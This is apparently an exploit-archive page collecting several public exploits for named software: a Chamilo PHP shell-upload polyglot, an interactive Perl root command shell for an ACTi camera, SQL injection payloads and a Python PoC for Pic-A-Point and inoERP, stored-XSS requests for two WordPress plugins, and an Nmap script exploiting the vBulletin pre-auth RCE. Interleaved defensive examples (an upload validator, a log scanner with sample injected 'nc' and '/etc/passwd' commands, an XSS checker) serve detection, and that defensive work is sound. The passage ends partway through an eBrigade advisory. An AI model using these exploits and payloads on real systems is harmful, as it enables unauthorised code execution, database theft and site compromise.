
Chrome IndexedDBConnection::Close Use-After-Free


Chamilo LMS 1.11.8 Shell Upload


Chamilo LMS version 1.11.8 suffers from a remote shell upload vulnerability.


MD5 | cd0f46654104ad90b791bf2c1eeaf810


# Exploit Title: Chamilo LMS Arbitrary File Upload
# Google Dork: "powered by chamilo"
# Date: 05/10/2018
# Exploit Author: Sohel Yousef jellyfish security team
# Software Link: https://chamilo.org/en/download/
# Version: Chamilo 1.8 through 1.11.8
# Category: webapps

1. Description

Any registered user can upload a file through the CKEditor/elFinder file manager in
the "My files" section and then rename it so that its extension becomes a PHP
variant such as php5 or php7, which the server still executes.

Register here:

http://localhost/chamilo/main/auth/inscription.php

After registration the following sections are reachable:

http://localhost/chamilo/main/social/myfiles.php

http://localhost/chamilo/main/inc/lib/elfinder/filemanager.php?&CKEditor=content&CKEditorFuncNum=0

Upload your shell as a .gif file and then rename it to change the extension.

If the rename function is disabled, prepend GIF89;aGIF89;aGIF89;a to the file
before the <?php block, so that it looks like this example:

GIF89;aGIF89;aGIF89;a<html>
<head>
<title>PHP Test</title>
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="fileToUpload" id="fileToUpload">
<input type="submit" value="upload file" name="submit">
</form>
</head>
<body>
<?php echo '<p>FILE UPLOAD</p><br>';
$tgt_dir = "uploads/";
$tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
echo "<br>TARGET FILE= ".$tgt_file;
//$filename = $_FILES['fileToUpload']['name'];
echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
if(isset($_POST['submit']))
{
if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
{ echo "<br>file exists, try with another name"; }
else {
echo "<br>STARTING UPLOAD PROCESS<br>";
if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
{ echo "<br>File UPLOADED:- ".$tgt_file; }

else { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
}
}
?>
</body>
</html>

and upload it as php.gif.
The uploaded files can be browsed from the right-click menu ("browse" option).
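The following is an added example, not part of the advisory or of Chamilo's own code. It shows why an upload filter that only looks at image magic bytes is defeated by the polyglot above, and what a check that combines extension and content looks like. Two points worth knowing: the genuine GIF signature is GIF89a, so the prefix as written in the advisory (GIF89;a) would not even pass a strict magic check; and a rename is the same decision as an upload and has to be re-validated against the stored bytes, which is exactly the step the bypass relies on being skipped. All function names are hypothetical.

```python
import re
from typing import Optional, Tuple

# Extensions that typical Apache/PHP handler configs execute. The advisory's bypass renames
# to .php5/.php7, which a filter that only knows ".php" lets through.
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar"}

# Genuine image signatures. The GIF one is "GIF89a"; "GIF89;a" as written in the advisory
# does not match it.
IMAGE_MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
}
EXTENSIONS_FOR = {"gif": {"gif"}, "png": {"png"}, "jpeg": {"jpg", "jpeg"}}


def sniff_image(content: bytes) -> Optional[str]:
    """Image type implied by the leading bytes, or None. On its own this is what the polyglot defeats."""
    for magic, kind in IMAGE_MAGIC.items():
        if content.startswith(magic):
            return kind
    return None


def has_php_tag(content: bytes) -> bool:
    """A polyglot keeps a valid image header but carries <?php (or <?=) further in."""
    return re.search(rb"<\?(php|=)", content, re.IGNORECASE) is not None


def extension_parts(filename: str):
    """Every suffix, lower-cased: 'shell.php.gif' -> ['php', 'gif'], so double extensions are seen."""
    return [p.lower() for p in filename.split(".")[1:]]


def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Decide whether a file may be stored under this name. Call it again on rename,
    with the stored bytes and the new name: a rename is the same decision."""
    exts = extension_parts(filename)
    if not exts:
        return False, "no extension"
    if any(e in EXECUTABLE_EXTENSIONS for e in exts):
        return False, "executable extension"
    kind = sniff_image(content)
    if kind is None:
        return False, "no recognised image signature"
    if exts[-1] not in EXTENSIONS_FOR[kind]:
        return False, "extension does not match content"
    if has_php_tag(content):
        return False, "image header followed by PHP code (polyglot)"
    return True, "ok"


if __name__ == "__main__":
    # Constructed polyglot in the shape the advisory describes: valid GIF header, PHP behind it.
    polyglot = b"GIF89a" + b"<?php echo '<p>FILE UPLOAD</p>'; ?>"
    print(sniff_image(polyglot))                      # gif: a magic-only check is satisfied
    print(check_upload("php.gif", polyglot))          # rejected as polyglot
    print(check_upload("php.php5", polyglot))         # the rename step is rejected on extension
```

The order of the checks matters: the extension test runs first and over every suffix, so `shell.php.gif` is refused before any content inspection, and the PHP-tag scan runs last because it is the only one that catches the case where name and header are both plausible.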

ACTi ACM-3100 Camera Remote Command Execution


ACTi ACM-3100 Camera remote command execution exploit.


MD5 | 8513614259f3c20ff4d2204c4b73f788

#!/usr/bin/perl
#
# ACTi ACM-3100 Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [test@localhost acti]$ perl actiroot.pl 192.168.1.1
# # [ ACTi ACM-3100 Camera Remote Command Execution Exploit
# # [ =========================================================
# # [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com>
# # # id
# # execute : /sbin/iperf -c ;id &
# # uid=0(root) gid=0(root)
# # # ls -la
# # execute : /sbin/iperf -c ;ls -la &
# # -rwxr-xr-x 1 0 0 14900 test
# # -rwxr-xr-x 1 0 0 32028 80503736
# # -rwxr-xr-x 1 0 0 8872 macdev
# # -rwxr-xr-x 1 0 0 29804 updatem
# # -rwxr-xr-x 1 0 0 31788 update
# # -rwxr-xr-x 1 0 0 28676 mpeg4
# # -rwxr-xr-x 1 0 0 137040 videoconfiguration.cgi
# # lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # -rwxr-xr-x 1 0 0 27780 system
# # drwxr-xr-x 2 0 0 1024 cmd
# # drwxr-xr-x 5 0 0 1024 ..
# # drw-r--r-- 3 0 0 1024 .
# # # ls -la /etc/
# # execute : /sbin/iperf -c ;ls -la /etc/ &
# # -rw-r--r-- 1 0 0 71 hosts
# # drwxr-xr-x 3 0 0 1024 default
# # drwxr-xr-x 2 0 0 1024 config
# # -rwxr-xr-x 1 0 0 5834 protocols
# # drwxr-xr-x 4 0 0 1024 ppp
# # drwxr-xr-x 2 0 0 1024 dhcpc
# # -rwxr-xr-x 1 0 0 211 inittab
# # -rwxr-xr-x 1 0 0 26 host.conf
# # -rwxr-xr-x 1 0 0 534 passwd
# # -rwxr-xr-x 1 0 0 280 group
# # drwxr-xr-x 2 0 0 1024 init.d
# # -rwxr-xr-x 1 0 0 421 profile
# # -rw-r--r-- 1 0 0 25 resolv.conf
# # -rwxr-xr-x 1 0 0 10787 services
# # drwxr-xr-x 2 0 0 1024 thttpd
# # -rwxr-xr-x 1 0 0 251 fstab
# # drwxr-xr-x 13 0 0 1024 ..
# # drwxr-xr-x 8 0 0 1024 .
# # #
# #

use strict;
use warnings;
use LWP::Simple;

print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit
[ =========================================================
[ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
while(1)
{
print "# ";
my $cmd = <STDIN>;
last unless defined $cmd;   # EOF (Ctrl-D)
chomp $cmd;
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear'; next;}
last if $cmd eq 'exit';
# The CGI runs "/sbin/iperf -c <iperf>" as root; a leading ";" ends that command and
# the rest of the value is executed. getprint() writes the response body to STDOUT
# and returns the HTTP status, so nothing else needs printing.
last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}"));
}
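The ACM-3100 above and the ACD-2100 encoder later on this page are exploited through the same `/cgi-bin/test?iperf=` parameter, which the CGI splices into `/sbin/iperf -c <value>` (the "execute :" lines in both transcripts show it). The block below is an added example for the defensive side, not part of Todor Donev's exploit: it scans web-server access log lines for requests that smuggle shell metacharacters into that parameter. The log lines are constructed and the Common Log Format is an assumption about what the camera's thttpd writes; the decoding is done by hand because the injected `;` is exactly the character some query-string parsers treat as a separator.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Common Log Format lines (assumed to match what the camera's thttpd writes);
# not taken from a real device.
SAMPLE_LOG = """\
192.168.1.50 - - [26/Sep/2019:10:14:02 +0000] "GET /cgi-bin/test?iperf=;id HTTP/1.1" 200 37
192.168.1.50 - - [26/Sep/2019:10:14:09 +0000] "GET /cgi-bin/test?iperf=%3Bcat%20/etc/passwd HTTP/1.1" 200 512
192.168.1.50 - - [26/Sep/2019:10:14:21 +0000] "GET /cgi-bin/test?iperf=;ls -la /etc/ HTTP/1.1" 200 988
192.168.1.51 - - [26/Sep/2019:10:15:00 +0000] "GET /cgi-bin/test?iperf=192.168.1.2 HTTP/1.1" 200 88
192.168.1.52 - - [26/Sep/2019:10:16:00 +0000] "GET /cgi-bin/videoconfiguration.cgi HTTP/1.1" 200 1200
192.168.1.53 - - [26/Sep/2019:10:17:00 +0000] "GET /cgi-bin/test?iperf=10.0.0.1%7Cnc%2010.0.0.9%204444 HTTP/1.1" 200 12
"""

# The request target is matched lazily up to " HTTP/x.y" so an injected command that
# contains raw spaces (line 3) is captured whole instead of being cut at the first space.
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>.+?) HTTP/[\d.]+" (?P<status>\d{3})'
)
# Anything that terminates "/sbin/iperf -c <value>" early or chains another command.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def query_params(query: str):
    """Percent-decode by hand, splitting on '&' only: older parse_qs() also split on ';',
    which would swallow the very character the injection relies on."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def injected_command(target: str):
    """Shell text smuggled through /cgi-bin/test?iperf=..., or None for a benign request."""
    parts = urlsplit(target)
    if parts.path != "/cgi-bin/test":
        return None
    for value in query_params(parts.query).get("iperf", []):
        if SHELL_META.search(value):
            return value
    return None


def scan(lines):
    """One record per request that injects into the iperf parameter."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue
        cmd = injected_command(m.group("target"))
        if cmd is not None:
            hits.append({"src": m.group("src"), "ts": m.group("ts"), "iperf": cmd})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(hit)
```

Line 4 (a plain host for `iperf -c`) and line 5 (another CGI) are the negatives; the percent-encoded `%3B` and `%7C` variants are decoded before matching, so encoding the metacharacter does not evade the rule.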


Samsung Mobile Android SamsungTTS Privilege Escalation


The Samsung Text-to-speech Engine System Component on Android suffers from a local privilege escalation vulnerability. Versions before 3.0.02.7 and 3.0.00.101 are affected.


MD5 | 8f7af7fb883fdaea5d4b41303321e322

[CVE-2019-16253] Privilege Escalation in Samsung Mobile Android SamsungTTS Component


Software:
--------
Samsung Text-to-speech Engine System Component on Android


Description:
----------
The Text-to-speech Engine (aka SamsungTTS) before 3.0.02.7/3.0.00.101 for Android allows a local attacker to escalate privilege, e.g. to system privilege. The issue was reported to, confirmed and patched by the Samsung Mobile Security Rewards Program under case ID 101755.



Patched version:
------------
- Android N,O or older : 3.0.00.101
- Android P : 3.0.02.7



Impact:
-------
A successful local attack can obtain system privilege on vulnerable phones.


Solution:
---------
Update the TTS component via Galaxy AppStore to newest version or versions later than patched versions listed above.


Credit:
-------
Discovered by Qidan He (a.k.a. Edward Flanker, @flanker_hqd). Details about this vulnerability will be released shortly after confirmation from Samsung Mobile, in line with responsible disclosure.


------------------
Sincerely
Qidan (a.k.a Flanker)
Website: https://blog.flanker017.me



citecodecrashers Pic-A-Point 1.1 SQL Injection


citecodecrashers Pic-A-Point version 1.1 suffers from a remote SQL injection vulnerability.


MD5 | 4f4ef62ea6e3e6e89104aafdce3e442b

# Exploit Title: citecodecrashers Pic-A-Point 1.1 - 'Consignment' SQL Injection
# Author: Cakes
# Discovery Date: 2019-09-26
# Vendor Homepage: https://github.com/citecodecrashers/Pic-A-Point
# Software Link: https://github.com/citecodecrashers/Pic-A-Point/archive/master.zip
# Tested Version: 1.1
# Tested on OS: CentOS 7
# CVE: N/A

# Description:
# Simple SQL injection in the 'Consignment' POST parameter, reachable after authenticating to the application.

# POST Request

# Parameter: Consignment (POST)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)

Payload: Consignment=1234' AND 9752=(SELECT (CASE WHEN (9752=9752) THEN 9752 ELSE (SELECT 1018 UNION SELECT 3533) END))-- QBEy&Submit=Trace now

# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)

Payload: Consignment=1234' AND (SELECT 4396 FROM(SELECT COUNT(*),CONCAT(0x7162707871,(SELECT (ELT(4396=4396,1))),0x716a7a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hufy&Submit=Trace now

# Type: time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)

Payload: Consignment=1234' AND (SELECT 9267 FROM (SELECT(SLEEP(5)))qpkL)-- OiWK&Submit=Trace now

# Type: UNION query
# Title: Generic UNION query (NULL) - 20 columns

Payload: Consignment=1234' UNION ALL SELECT NULL,CONCAT(0x7162707871,0x614b666177515872456a7177706f6b654d54744e75644e4b597648496742464c6346656865654e67,0x716a7a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- cUud&Submit=Trace now

inoERP 4.15 SQL Injection


inoERP version 4.15 suffers from a remote SQL injection vulnerability.


MD5 | 3adb8f3eac751702e1d7c3f5a4dfc122

# Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A


# A malicious query can be sent in base64 encoding to unserialize() function.
# It can be deserialized as an array without any sanitization then.
# After it, each element of the array is passed directly to the SQL query.


#!/usr/bin/env python3

import os
import base64
import requests
import sys


def generatePayload(query):
    # THIS FUNCTION IS INSECURE BY DESIGN: it shells out to php to serialize the query.
    # Only feed it input you control.
    b64_query = base64.b64encode(query.encode()).decode()
    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()


def ExecSQL(target, query):
    # download.php base64-decodes and unserializes "data", then passes the result into a SQL query
    data = {"data": query,
            "data_type": "sql_query"}

    r = requests.post("http://" + target + "/download.php", data=data)
    return r.content


if __name__ == "__main__":

    if len(sys.argv) != 3:
        print('(+) usage: %s <target> <path>' % sys.argv[0])
        print('(+) eg: %s 127.0.0.1 "ierp/"' % sys.argv[0])
        sys.exit()

    target = sys.argv[1] + "/" + sys.argv[2]

    # if you don't have php, use this ready-made payload for "select @@version;": czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==

    data = r"select * from ino_user;"

    print(ExecSQL(target, generatePayload(data)))
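The PoC above shells out to `php -r` only to produce PHP's `serialize()` encoding of a string, which is a fixed, simple format: `s:<byte length>:"<bytes>";`. The following added example (not part of the original exploit) builds that encoding in Python so no PHP interpreter is needed, and can be checked against the ready-made payload the author gives for `select @@version;`. The byte count is the UTF-8 length, not the character count; the `exec_sql` helper mirrors the PoC's POST with the standard library and is not exercised here because it needs a live target.

```python
import base64
import urllib.parse
import urllib.request


def php_serialize_string(s: str) -> bytes:
    """PHP serialize() of a string: s:<len>:"<bytes>"; where <len> counts UTF-8 bytes."""
    raw = s.encode("utf-8")
    return b's:%d:"%s";' % (len(raw), raw)


def generate_payload(query: str) -> str:
    """base64(serialize(query)): the value download.php unserializes. Pure Python, no php -r."""
    return base64.b64encode(php_serialize_string(query)).decode("ascii")


def decode_payload(payload: str) -> bytes:
    """Inverse, for inspecting a captured or generated payload."""
    return base64.b64decode(payload)


def exec_sql(base_url: str, query: str, timeout: int = 10) -> bytes:
    """Same POST as the PoC's ExecSQL(), using urllib. Not called here: requires a live inoERP install."""
    form = urllib.parse.urlencode({"data": generate_payload(query), "data_type": "sql_query"}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/download.php", data=form, method="POST")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read()


if __name__ == "__main__":
    print(generate_payload("select @@version;"))
    print(decode_payload("czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw=="))
```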

all-in-one-seo-pack 3.2.7 Cross Site Scripting


all-in-one-seo-pack version 3.2.7 suffers from a persistent cross site scripting vulnerability.


MD5 | 955890e6566325a68242aca7a5a0cb7d

# Exploit Title: all-in-one-seo-pack 3.2.7 - Persistent Cross-Site Scripting
# Google Dork: inurl:"\wp-content\plugins\all-in-one-seo-pack"
# Date: 2019-06-13
# Exploit Author: Unk9vvN
# Vendor Homepage: https://semperplugins.com/all-in-one-seo-pack-pro-version
# Software Link: https://wordpress.org/plugins/all-in-one-seo-pack/
# Version: 3.2.7
# Tested on: Windows 10
# CVE: N/A

# Description
# Stored (persistent) XSS. The "Additional Front Page Headers" and "Additional Posts Page Headers" options (aiosp_front_meta_tags, aiosp_home_meta_tags) are saved without validation and emitted unescaped into the pages they apply to, so the stored script runs for every visitor of those pages. The options are updated through wp-admin, so the attacker needs an authenticated account that is allowed to change the plugin's settings.

1. Go to the 'all-in-one-seo-pack' tab
2. Select the 'general settings' section
3. Enter the payload in the "Additional Front Page Headers" and "Additional Posts Page Headers" fields
4. Click the "Update Options" button
5. The payload runs when the page is visited


# URI: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack
# Payload: "><script>alert(1)</script>

#
# PoC
#
POST /wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/admin.php?page=all-in-one-seo-pack%2Faioseop_class.php
Content-Type: multipart/form-data; boundary=---------------------------24442753012045
Content-Length: 8625
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_front_meta_tags"

"><script>alert(1)</script>
-----------------------------24442753012045
Content-Disposition: form-data; name="aiosp_home_meta_tags"

"><script>alert(1)</script>
-----------------------------24442753012045

Content-Disposition: form-data; name="Submit"

Update Options »
-----------------------------24442753012045--


# Discovered by:
https://unk9vvn.com

Duplicate-Post 3.2.3 Cross Site Scripting


Duplicate-Post version 3.2.3 suffers from a persistent cross site scripting vulnerability.


MD5 | bb96cc3f76981e4b29dcc54b43e3427e

# Exploit Title: Duplicate-Post 3.2.3 - Persistent Cross-Site Scripting
# Google Dork: N/A
# Date: 2019-06-11
# Exploit Author: Unk9vvN
# Vendor Homepage: https://duplicate-post.lopo.it/
# Software Link: https://wordpress.org/plugins/duplicate-post/
# Version: 3.2.3
# Tested on: Kali Linux
# CVE: N/A

# Description
# Stored (persistent) XSS in the plugin's settings page: the options below are saved via options.php without validation and rendered back unescaped, so the payload runs when the settings are displayed. Saving requires an authenticated user who may update options; the request also carries a valid _wpnonce, which is bound to the session and must be taken from a live settings page rather than reused from this PoC.

1. Go to the 'Settings' section
2. Enter the payload in the "Title prefix", "Title suffix", "Increase menu order by" and "Do not copy these fields" fields
3. Click the "Save Changes" button
4. Your payload will run

# URI: http://localhost/wp-admin/options-general.php?page=duplicatepost
# Parameter & Payload:

duplicate_post_title_prefix="><script>alert(1)</script>
duplicate_post_title_suffix="><script>alert(1)</script>
duplicate_post_increase_menu_order_by="><script>alert(1)</script>
duplicate_post_blacklist="><script>alert(1)</script>


#
# PoC
#
POST /wp-admin/options.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/options-general.php?page=duplicatepost
Content-Type: application/x-www-form-urlencoded
Content-Length: 981
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

option_page=duplicate_post_group&action=update&_wpnonce=0e8a49a372&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dduplicatepost%26settings-updated%3Dtrue&duplicate_post_copytitle=1&duplicate_post_copyexcerpt=1&duplicate_post_copycontent=1&duplicate_post_copythumbnail=1&duplicate_post_copytemplate=1&duplicate_post_copyformat=1&duplicate_post_copymenuorder=1&duplicate_post_title_prefix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_title_suffix=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_increase_menu_order_by=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_blacklist=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&duplicate_post_roles%5B%5D=administrator&duplicate_post_roles%5B%5D=editor&duplicate_post_types_enabled%5B%5D=post&duplicate_post_types_enabled%5B%5D=page&duplicate_post_show_row=1&duplicate_post_show_submitbox=1&duplicate_post_show_adminbar=1&duplicate_post_show_bulkactions=1&duplicate_post_show_notice=1


# Discovered by:
https://t.me/Unk9vvN
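Both WordPress advisories above (all-in-one-seo-pack and Duplicate-Post) store the same `"><script>alert(1)</script>` value and then rely on an alert popping up. The block below is an added example, not code from either advisory or plugin, for checking a stored-XSS result from the fetched HTML instead: it tells apart a value rendered verbatim from one that came back entity-encoded (what `esc_attr`/`esc_html` output looks like), and reports where the verbatim copy landed, because `<script>` inside a textarea or title is inert while the same bytes inside an attribute value are executable thanks to the leading `">`. The sample pages in the test are constructed.

```python
import html
import re

# The payload both advisories store: the leading "> closes an attribute and its tag.
PAYLOAD = '"><script>alert(1)</script>'

# Elements whose content the HTML parser treats as raw text: a <script> tag inside them does
# not execute unless the payload also closes the enclosing element.
RAW_TEXT_ELEMENTS = ("textarea", "title", "script", "style")


def render_context(page: str, payload: str):
    """Where the verbatim payload landed: 'attribute', 'text' or 'rawtext:<element>' (None if absent)."""
    idx = page.find(payload)
    if idx < 0:
        return None
    before = page[:idx]
    if before.rfind("<") > before.rfind(">"):
        return "attribute"  # inside an unclosed tag: the payload's "> breaks out of it
    for name in RAW_TEXT_ELEMENTS:
        opened = len(re.findall(r"<%s\b" % name, before, re.IGNORECASE))
        closed = len(re.findall(r"</%s\b" % name, before, re.IGNORECASE))
        if opened > closed:
            return "rawtext:" + name
    return "text"


def assess(page: str, payload: str = PAYLOAD):
    """(verdict, context). 'unescaped': rendered as markup; 'escaped': only an entity-encoded
    copy is present; 'absent': not stored, or not rendered on this page."""
    if payload in page:
        return "unescaped", render_context(page, payload)
    encoded = {html.escape(payload, quote=True), html.escape(payload, quote=False)}
    if any(form in page for form in encoded):
        return "escaped", None
    return "absent", None


def executes(page: str, payload: str = PAYLOAD) -> bool:
    """True when the stored value would run as script on this page as-is."""
    verdict, context = assess(page, payload)
    return verdict == "unescaped" and not context.startswith("rawtext")


if __name__ == "__main__":
    # Constructed fragments in the shape of the two settings pages.
    head = '<head>\n"><script>alert(1)</script>\n</head>'
    field = '<input name="duplicate_post_title_prefix" value=""><script>alert(1)</script>">'
    fixed = '<input name="duplicate_post_title_prefix" value="&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;">'
    for sample in (head, field, fixed):
        print(assess(sample), executes(sample))
```

Run it against the raw response of the page the payload is expected to appear on (the front page for the SEO plugin, the settings page for Duplicate-Post), not the response to the POST that saved it; the latter is usually a redirect.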


vBulletin 5.x 0-Day Pre-Auth Remote Command Execution


Nmap NSE script that exploits a pre-authentication remote command execution vulnerability in vBulletin versions 5.x.


MD5 | e75178e2c6510a67c0a70dc3027d65cf

description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]]

local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"

---
-- @usage
-- nmap -p <port> --script http-vuln-cve2019-16759 <target>
--
-- @output
-- PORT STATE SERVICE
-- s4430/tcp open http
-- | http-vuln-cve2019-16759:
-- | VULNERABLE
-- | vBulletin 5.x 0day pre-auth RCE exploit
-- | State: VULNERABLE
-- | IDs: CVE:CVE-2019-16759
-- |
-- | Disclosure date: 2019-09-23
-- | References:
-- | https://seclists.org/fulldisclosure/2019/Sep/31
-- |_ https://nvd.nist.gov/vuln/detail/CVE-2019-16759
--
-- @args http-vuln-cve2019-16759.path The URL path to request. The default is
-- "/index.php?routestring=ajax/render/widget_php".

author = "r00tpgp"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = { "vuln" }

portrule = shortport.http

action = function(host, port)
local vuln = {
title = "vBulletin 5.x 0day pre-auth RCE exploit",
state = vulns.STATE.NOT_VULN,
description = [[
vBulletin 5.x 0day pre-auth RCE exploit
This should work on all versions from 5.0.0 till 5.5.4
]],
IDS = {
CVE = "CVE-2019-16759"
},
references = {
'https://seclists.org/fulldisclosure/2019/Sep/31',
'https://nvd.nist.gov/vuln/detail/CVE-2019-16759',
},
dates = {
disclosure = { year = '2019', month = '09', day = '23' }
}
}

local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

local path = stdnse.get_script_args(SCRIPT_NAME..".path") or "/index.php?routestring=ajax/render/widget_php"

-- The injected PHP writes a marker file on the target and reads it back. Be aware that this
-- leaves /tmp/nmap.check.out behind; "echo h4x0000r" alone gives the same evidence without
-- touching the target's disk.
local body = {
["widgetConfig[code]"] = "echo shell_exec(\'echo h4x0000r > /tmp/nmap.check.out; cat /tmp/nmap.check.out\');exit;",
}

local options = {
header = {
Connection = "close",
["Content-Type"] = "application/x-www-form-urlencoded",
["User-Agent"] = "curl/7.65.3",
["Accept"] = "*/*",
},
}
-- http.post(host, port, path, options, cookies, postdata): the options table has to be
-- passed here, otherwise the headers above are never sent.
local response = http.post(host, port, path, options, nil, body)

if response and response.body and string.match(response.body, "h4x0000r") then
vuln.state = vulns.STATE.VULN
end

return vuln_report:make_output(vuln)
end

eBrigade SQL Injection


eBrigade versions prior to 5.0 suffer from multiple remote SQL injection vulnerabilities.


MD5 | d728e81587531ee5c5d7a44a62cb05a4

SEC Consult Vulnerability Lab Security Advisory < 20190926-0 >
=======================================================================
title: Multiple SQL Injection vulnerabilities
product: eBrigade
vulnerable version: <5.0
fixed version: >=5.0
CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745
impact: critical
homepage: https://ebrigade.net
found: 2019-06-06
by: D. Haintz (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"eBrigade is a web application that allows the management of personnel, vehicles
and equipment of rescue centers (fire brigades), associations of first
responders and military organizations. Highly configurable, eBrigade can meet
the expectations of many other organizations. Skills management, generation of
the cover sheet according to availability. Management of the interventions and
the victims with assessment sheets rescuers. Private social network.
Notifications and alerts by email and SMS. Accounting, reporting and numerous
graphs allow precise monitoring of the organization." (translated)

Source: https://ebrigade.net/


Business recommendation:
------------------------
The vendor provides a patch and users of this product are urged to immediately
upgrade to the latest version available.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected from further security
issues.


Vulnerability overview/description:
-----------------------------------
1) Multiple SQL Injection vulnerabilities
Due to insufficient sanitization of user input an authenticated attacker can
execute arbitrary SQL code in several SELECT statements. Two of the three
vulnerable parameters are completely unsanitized and belong to the scripts that
serve iCal files, so an attacker can make a user download manipulated calendar
files and can also dump the whole database.

The third vulnerability results from wrong usage of a sanitization function.
This enables an attacker to manipulate the SQL query with specially crafted
requests, resulting in a blind SQL injection, as described in vulnerability c)
below.

a) & b) Multiple UNION SQL Injections (CVE-2019-16743, CVE-2019-16744)
The parameters of two links can be manipulated so any arbitrary query to any
table or database can be added to the output of the resulting calendar files
using the UNION functionality of SQL.

c) Boolean-based Blind SQL Injection (CVE-2019-16745)
The parameters of a search result can be manipulated to guess the returned
values of an arbitrary query.


Proof of concept:
-----------------
1) Multiple SQL Injection vulnerabilities
All vulnerabilities were tested with an authenticated user with the lowest
access rights (public). The whole PoC script requires an authenticated user for any
functionality.
The user is authenticated by a PHP session using the cookie PHPSESSID (may
vary at different webservers). In conclusion, every request described below
requires the PHP session cookie.


a) UNION SQL Injection in evenement_ical.php (CVE-2019-16743)

The script evenement_ical.php uses the unsanitized parameter "evenement" to
query the database. The results are written into a downloadable calendar file.
By adding a UNION statement, an attacker can extend the output with arbitrary
data of the database:

The user input is read on line 42:
$evenement=(isset($_GET['evenement'])?$_GET['evenement']:"");

On line 88-89 it is added to the SQL statement:
if ($evenement !="")
$sql .= "\n and e.e_code = $evenement ";

Which is executed and fetched in line 136 and 138:
$res = mysqli_query($dbc,$sql);
